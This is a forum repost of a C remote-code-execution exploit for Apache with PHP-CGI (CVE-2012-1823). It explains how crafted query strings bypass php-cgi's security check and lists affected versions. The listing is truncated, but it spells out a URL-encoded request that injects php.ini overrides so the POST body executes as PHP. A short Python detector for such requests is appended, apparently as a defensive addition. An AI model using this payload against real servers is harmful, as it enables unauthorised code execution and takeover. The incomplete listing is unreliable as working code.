[Experience Sharing] Apache / PHP 5.x Remote Code Execution Exploit

Posted on 2015-8-6 10:26:23
Test method:
  The programs (methods) provided on this site may be offensive in nature and are intended only for security research and teaching; use at your own risk!

```c
/* Apache Magica by Kingcope */
/* gcc apache-magika.c -o apache-magika -lssl */
/* This is a code execution bug in the combination of Apache and PHP.
   On Debian and Ubuntu the vulnerability is present in the default install
   of the php5-cgi package. When the php5-cgi package is installed on Debian and
   Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
   /cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
   the binary because this binary has a security check enabled when installed with
   Apache http server and this security check is circumvented by the exploit.
   When accessing the php-cgi binary the security check will block the request and
   will not execute the binary.
   In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
   check is done when the php.ini configuration setting cgi.force_redirect is set
   and the php.ini configuration setting cgi.redirect_status_env is set to no.
   This makes it possible to execute the binary bypassing the Security check by
   setting these two php.ini settings.
   Prior to this code for the Security check getopt is called and it is possible
   to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
   -d switch. If both values are set to zero and the request is sent to the server
   php-cgi gets fully executed and we can use the payload in the POST data field
   to execute arbitrary php and therefore we can execute programs on the system.
   apache-magika.c is an exploit that does exactly the prior described. It does
   support SSL. */
/* Affected and tested versions
   PHP 5.3.10
   PHP 5.3.8-1
   PHP 5.3.6-13
   PHP 5.3.3
   PHP 5.2.17
   PHP 5.2.11
   PHP 5.2.6-3
   PHP 5.2.6+lenny16 with Suhosin-Patch
   Affected versions
   PHP prior to 5.3.12
   PHP prior to 5.4.2
   Unaffected versions
   PHP 4 - getopt parser unexploitable
   PHP 5.3.12 and up
   PHP 5.4.2 and up
   Unaffected versions are patched by CVE-2012-1823.
*/
/* .
   /'\rrq rk
   . // \\ .
   .x.//fco\\-|-
   '//cmtco\\zt
   //6meqrg.\\tq
   //_________\\'
   EJPGQO
   apache-magica.c by Kingcope
*/

/* Angle-bracketed tokens (the #include header names and the placeholders in the
   usage string) were stripped when this page was extracted, and the listing as
   posted ends mid-declaration at phpstr. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

typedef struct {
    int sockfd;
    SSL *handle;
    SSL_CTX *ctx;
} connection;

void usage(char *argv[])
{
    printf("usage: %s    " \
           "  [--force-interpreter interpreter]\n",
           argv[0]);
    exit(1);
}

char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
    "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
    "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
    "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
    "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
    "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
    "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
    "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \
    "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \
    "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \
    "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \
    "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \
    "Host: %s\r\n" \
    "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" \
    "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \
    "Content-Type: application/x-www-form-urlencoded\r\n" \
    "Content-Length: %d\r\n" \
    "Connection: close\r\n\r\n%s";
char phpstr[] = "
```
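Added example, not part of the original post or of apache-magika.c: a Python check that applies the CGI indexed-query rule the exploit relies on (RFC 3875: a query string with no literal `=` is passed to the CGI binary as argv) to HTTP request lines, and reports which php.ini settings a request would override with `-d`. The sample request lines are constructed for the example; the first mirrors the shape of the request the C listing above builds.

```python
from urllib.parse import unquote

# Constructed sample request lines (not from a real server log). The first has the
# shape of the request apache-magika.c builds and decodes to
# "-d allow_url_include=on -d cgi.force_redirect=0 -n".
SAMPLE_REQUESTS = [
    "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65"
    "%3D%6F%6E+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30"
    "+%2D%6E HTTP/1.1",
    # '%3D' is not a literal '=', so this one is still handed over as argv
    "GET /cgi-bin/php5?-d+cgi.force_redirect%3D0 HTTP/1.1",
    # ordinary form query: a literal '=' is present, nothing reaches argv
    "GET /index.php?page=3&sort=asc HTTP/1.1",
    # indexed search without a switch: argv, but not a php-cgi option
    "GET /cgi-bin/php?info HTTP/1.1",
]

def cgi_argv_from_query(raw_query):
    """RFC 3875 rule: a query string with no literal '=' is an indexed search and
    is passed to the CGI program as argv, split on '+' with each part decoded."""
    if raw_query == "" or "=" in raw_query:
        return []
    return [unquote(part) for part in raw_query.split("+")]

def analyze_request_line(line):
    """Return the would-be argv, the php.ini overrides given via -d, and whether
    the request should be flagged (some argv element looks like a switch)."""
    _method, target, _version = line.split(" ", 2)
    path, _sep, raw_query = target.partition("?")
    argv = cgi_argv_from_query(raw_query)
    overrides = []
    for i, arg in enumerate(argv):
        if arg == "-d" and i + 1 < len(argv):
            overrides.append(argv[i + 1])   # "-d key=value"
        elif arg.startswith("-d") and len(arg) > 2:
            overrides.append(arg[2:])       # "-dkey=value"
    return {"path": path, "argv": argv, "ini_overrides": overrides,
            "suspicious": any(arg.startswith("-") for arg in argv)}

def scan(lines):
    """Return only the flagged results, in input order."""
    return [r for r in map(analyze_request_line, lines) if r["suspicious"]]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit["path"], hit["ini_overrides"])
```

Requests whose overrides include cgi.force_redirect=0 or cgi.redirect_status_env=0 are the ones the post describes; on PHP 5.3.12 / 5.4.2 and later the same query is rejected by php-cgi itself.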

Thread address: https://www.yunweiku.com/thread-94668-1-1.html